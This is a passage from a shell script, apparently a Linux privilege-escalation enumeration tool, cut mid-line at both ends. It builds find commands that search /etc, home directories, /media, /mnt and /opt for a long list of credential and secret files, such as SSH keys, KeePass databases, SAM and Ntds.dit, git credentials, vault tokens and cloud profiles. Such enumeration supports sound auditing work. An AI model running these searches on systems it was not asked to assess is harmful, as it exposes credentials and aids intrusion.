-o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"*knockd*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"google-chrome\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name 